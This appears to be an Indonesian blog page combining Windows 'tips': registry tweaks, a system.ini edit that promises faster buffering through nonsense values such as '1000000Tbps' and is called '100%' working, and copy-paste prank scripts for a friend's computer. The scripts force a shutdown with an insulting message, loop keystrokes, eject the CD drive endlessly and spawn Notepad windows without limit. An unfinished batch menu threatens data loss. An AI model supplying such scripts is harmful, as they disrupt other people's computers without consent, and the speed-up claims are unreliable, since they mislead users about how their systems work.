okeh begini caranya :
1. Klik Start > Run > ketik "regedit" ( tanpa tanda kutip )
2. Lalu HKEY.USERS > .DEFAULT > Control Panel > Desktop
3. Lalu ubah valuenya menjadi
AutoEndTasks : 1
DragFulWindows : 0
HungAppTimeout : 100
MenuShowDelay : 0
WaitToKillAppTimeout : 100
***** Cara mengubah value : di double klik angka nya. dan terus diganti angkanya jadi yg ditulis diatas tadi
Setelah semuanya selesai , restart komputer dan rasakan perbedaanya :)
Enjoy it!
sumber : kaskus.us
Read more..
REGEDIT! mempercepat loading komputer !
Mempercepat buffering video hanya dengan memakai notepad
Langsung saja yaaa..
1. Klik Start > Run ( atau shortcutnya Ctrl + R )
2. Dan tulis "system.ini" (tanpa tanda kutip) lalu tekan enter
3. Kemudian akan muncul notepad seperti ini
4. Sekarang copy teks dibawah ini
page buffer=1000000Tbps
load=1000000Tbps
download=1000000Tbps
save=1000000Tbps
back=1000000Tbps
search=1000000Tbps
sound=1000000Tbps
webcam=1000000Tbps
voice=1000000Tbps
faxmodemfast=1000000Tbps
update=1000000Tbps
5. Lalu paste dibawahnya jadi seperti ini
.
6. Save ( Ctrl + S ) dan kemudian restart komputer. Lihat sendiri hasilnya
Cara ini sudah saya coba sendiri kok :)
Work 100%
Selamat mencoba!
Sumber : kaskus.us
Read more..
Script buat isengin komputer teman. HIHIHI
1) memberi pesan dan shutdown komputer.
Buka Notepad ketik script dibawah ini dan Save As menggunakan Extension .BAT@echo off
msg * Aku tidak suka kamu
shutdown -c "Error! Kamu jelek sekali" -s
Buka Notepad ketik script dibawah ini dan Save As menggunakan Extension .VBSSet wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
Buka Notepad ketik script dibawah ini dan Save As menggunakan Extension .VBSSet oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Buka Notepad ketik script dibawah ini dan Save As menggunakan Extension .VBSSet wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
Buka Notepad ketik script dibawah ini dan Save As menggunakan Extension .VBSWScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "
Buka Notepad ketik script dibawah ini dan Save As menggunakan Extension .VBSMsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
Buka Notepad ketik script dibawah ini dan Save As menggunakan Extension .VBSSet wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a gay"
loop
Buka Notepad ketik script dibawah ini dan Save As menggunakan Extension .BAT@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
Buka Notepad ketik script dibawah ini dan Save As menggunakan Extension .BAT@echo off
title The end of the world
cd C:\
:menu
cls
echo oops gw gak tanggung jawab lho apa yang barusan lu lakuin hehhe,,semuanya dh jadi tanggung jawab lu sendiri...
pause
echo pilih nama cwe yang lu suka =P :
echo 1. datanya bakal ilang lho.
echo 2. komputer nya corrupt lho
echo 3. heheh no comment deh klo yang ini
echo 4. mau mati pake jalan ini?
echo 5. bye bye...
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two
Read more..